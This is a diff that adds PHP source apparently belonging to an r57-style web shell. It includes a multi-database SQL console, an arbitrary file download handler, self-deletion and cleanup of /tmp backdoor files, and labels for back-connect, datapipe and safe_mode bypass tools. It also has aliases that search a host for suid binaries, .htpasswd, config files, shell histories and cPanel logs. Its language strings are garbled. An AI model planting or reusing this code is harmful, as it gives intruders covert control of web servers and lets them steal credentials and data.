+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'����� ������',
+'eng_text2' =>'����� ������� �� �������',
+'eng_text3' =>'��� �������',
+'eng_text4' =>'���� ���� ���� ��� �������',
+'eng_text5' =>'��� ��� ��� �������',
+'eng_text6' =>'���� ����',
+'eng_text7' =>'����� �����',
+'eng_text8' =>'���� �����',
+'eng_butt1' =>'�����',
+'eng_butt2' =>'����',
+'eng_text9' =>'��� ���� �� ������� ��� /bin/bash',
+'eng_text10'=>'�����',
+'eng_text11'=>'������ ������',
+'eng_butt3' =>'���',
+'eng_text12'=>'������ �����',
+'eng_text13'=>'���� ��',
+'eng_text14'=>'������',
+'eng_butt4' =>'������',
+'eng_text15'=>'��� ����� ��� �������',
+'eng_text16'=>'�� ����',
+'eng_text17'=>'���� �����',
+'eng_text18'=>'���� �����',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'������',
+'eng_text21'=>'&nbsp;����� ������',
+'eng_text22'=>'����� ��������',
+'eng_text23'=>'������ ������',
+'eng_text24'=>'������� ������',
+'eng_text25'=>'������ ������',
+'eng_text26'=>'������',
+'eng_butt5' =>'�����',
+'eng_text28'=>'����� �� ����� �����',
+'eng_text29'=>'����� ������',
+'eng_butt6' =>'����',
+'eng_text30'=>'��� ���',
+'eng_butt7' =>'���',
+'eng_text31'=>'����� ��� �����',
+'eng_text32'=>'����� ��� php �� ���� ���� eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'������',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'������� . ������',
+'eng_text37'=>'��� ��������',
+'eng_text38'=>'���� ������',
+'eng_text39'=>'�������',
+'eng_text40'=>'���� �� ����� �������',
+'eng_butt9' =>'����',
+'eng_text41'=>'��� ������ ��',
+'eng_text42'=>'����� �������',
+'eng_text43'=>'����� ������ ������',
+'eng_butt10'=>'���',
+'eng_text44'=>'�������� ������� ��� ��� ����� ��� ����',
+'eng_text45'=>'�� �����',
+'eng_text46'=>'��� phpinfo()',
+'eng_text47'=>'���� ��������� �� php.ini',
+'eng_text48'=>'��� ����� ��� temp',
+'eng_butt11'=>'����� �����',
+'eng_text49'=>'��� ������� �� �������',
+'eng_text50'=>'��� ������� ������� ��������',
+'eng_text51'=>'��� ������� �������',
+'eng_text52'=>'��� ��',
+'eng_text53'=>'�� ������',
+'eng_text54'=>'��� �� �� �� �������',
+'eng_butt12'=>'���',
+'eng_text55'=>'��� �� �������',
+'eng_text56'=>'������ :(',
+'eng_text57'=>'�����/��� ���/����',
+'eng_text58'=>'�����',
+'eng_text59'=>'���',
+'eng_text60'=>'����',
+'eng_butt13'=>'����� /���',
+'eng_text61'=>'�� ����� �����',
+'eng_text62'=>'�� ����� ������',
+'eng_text63'=>'�� ��� �����',
+'eng_text64'=>'�� ��� ������',
+'eng_text65'=>'�����',
+'eng_text66'=>'���',
+'eng_text67'=>'�������/��������/��������',
+'eng_text68'=>'���',
+'eng_text69'=>'��� �����',
+'eng_text70'=>'�������',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'���� ������',
+'eng_text73'=>'��� �� ��������',
+'eng_text74'=>'��� �� �������',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'����� �� �� �� ����� ������ find',
+'eng_text80'=>'�����',
+'eng_text81'=>'���������',
+'eng_text82'=>'����� ��������',
+'eng_text83'=>'����� ��� �������',
+'eng_text84'=>'������� �����',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'����� ����� �� �������',
+'eng_butt14'=>'�����',
+'eng_text87'=>'����� ����� �� ���� ���� �� ��',
+'eng_text88'=>'����� ���� �� ��:������',
+'eng_text89'=>'��� �� ���� �� ��',
+'eng_text90'=>'������� ���',
+'eng_text91'=>'�����',
+'eng_text92'=>'�� ��� �������',
+'eng_text93'=>'���� �� ��',
+'eng_text94'=>'����� ���� �� ��',
+'eng_text95'=>'����� ����������',
+'eng_text96'=>'�� ����� ��� ����� ����������',
+'eng_text97'=>'�� �����: ',
+'eng_text98'=>'�� �����: ',
+'eng_text99'=>'* ������ ����� ���������� �� ��� /etc/passwd ����� ��� ftp',
+'eng_text100'=>'����� ��� ��� ���� ���� �� ��',
+'eng_text101'=>'������ ������� ������ ��������',
+'eng_text102'=>'����� ������',
+'eng_text103'=>'����� ����',
+'eng_text104'=>'����� ��� ��� �������',
+'eng_text105'=>'���',
+'eng_text106'=>'���',
+'eng_text107'=>'�������',
+'eng_butt15'=>'�����',
+'eng_text108'=>'�������',
+'eng_text109'=>'����',
+'eng_text110'=>'���',
+'eng_text111'=>'����� ����� �������� : ������',
+'eng_text112'=>'����� ������� �� ���� ���� ���� mb_send_mail',
+'eng_text113'=>'����� ����� �������� �� ���� via imap_list',
+'eng_text114'=>'����� ������� �� ���� ���� via imap_body',
+'eng_text115'=>'����� ������� �� ���� compress.zlib://',
+'eng_text116'=>'��� ��',
+'eng_text117'=>'���',
+'eng_text118'=>'�� ��� �����',
+'eng_text119'=>'�������� �����',
+'eng_err0'=>'���� ! ������ ������� ��� ��� ����� ',
+'eng_err1'=>'���� ! ��� ���� ��� ����� ��� ����� ',
+'eng_err2'=>'����! ������ ������� ',
+'eng_err3'=>'����! ��� ���� ��� ������� ����� �� ��',
+'eng_err4'=>'���� ! �������� ������ ��� ����� ���� �� ��',
+'eng_err5'=>'���� ! �������� ���� ������ �� ���� �� ��',
+'eng_err6'=>'���� ! �������� ����� �����',
+'eng_err7'=>'������ ����',
+'eng_text200'=>'����� ������� �� ���� ���� copy()',
+'eng_text202'=>'���� ����� ������ ������',
+'eng_text300'=>'����� ������� �� ���� ���� curl()',
+'eng_text302'=>'���� ����� ������ ������',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'����� �� ����� suid'=>'find / -type f -perm -04000 -ls',
+'����� �� ����� suid �� ������ ������'=>'find . -type f -perm -04000 -ls',
+'����� �� ����� suid'=>'find / -type f -perm -02000 -ls',
+'����� �� ����� suid �� ������ ������'=>'find . -type f -perm -02000 -ls',
+'����� �� ����� config.inc.php'=>'find / -type f -name config.inc.php',
+'����� �� ����� config.inc.php �� ������ ������'=>'find . -type f -name config.inc.php',
+'����� �� ����� config* ����� ����������'=>'find / -type f -name "config*"',
+'����� �� ����� config* �� ������ ������'=>'find . -type f -name "config*"',
+'����� �� ������� ������� �������'=>'find / -type f -perm -2 -ls',
+'����� �� ������� ������� ������� �� ������ ������'=>'find . -type f -perm -2 -ls',
+'����� �� �������� ������� �������'=>'find /  -type d -perm -2 -ls',
+'����� �� �������� ������� ������� �� ������ ������'=>'find . -type d -perm -2 -ls',
+'����� �� ����� ������� ����� �������'=>'find / -perm -2 -ls',
+'����� �� ����� ������� �� ������ ������'=>'find . -perm -2 -ls',
+'����� �� ����� service.pwd'=>'find / -type f -name service.pwd',
+'����� �� ����� service.pwd �� ������ ������'=>'find . -type f -name service.pwd',
+'����� �� �� ����� ������� ������� .htpasswd'=>'find / -type f -name .htpasswd',
+'����� �� ���� ����� ������� ������� �� ������ ������'=>'find . -type f -name .htpasswd',
+'����� �� ���� ����� .bash_history'=>'find / -type f -name .bash_history',
+'����� �� ���� ����� .bash_history �� ������ ������'=>'find . -type f -name .bash_history',
+'����� �� ���� ����� .mysql_history'=>'find / -type f -name .mysql_history',
+'����� �� ���� ����� .mysql_history �� ������ ������'=>'find . -type f -name .mysql_history',
+'����� �� ���� ����� .fetchmailrc'=>'find / -type f -name .fetchmailrc',
+'����� �� ���� ����� .fetchmailrc �� ������ ������'=>'find . -type f -name .fetchmailrc',
+'��� ����� ����� �� ������'=>'lsattr -va',
+'���� �������� �������� �� �������'=>'netstat -an | grep -i listen',
+'���� ���� �������� �������� �������'=>'cat /etc/fstab',
+'������ ��� ����� ����� ���� ���� �������� ��� �������'=>'cat /var/cpanel/accounting.log',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#000000><font face=tahoma size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=tahoma size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users']))
+ {
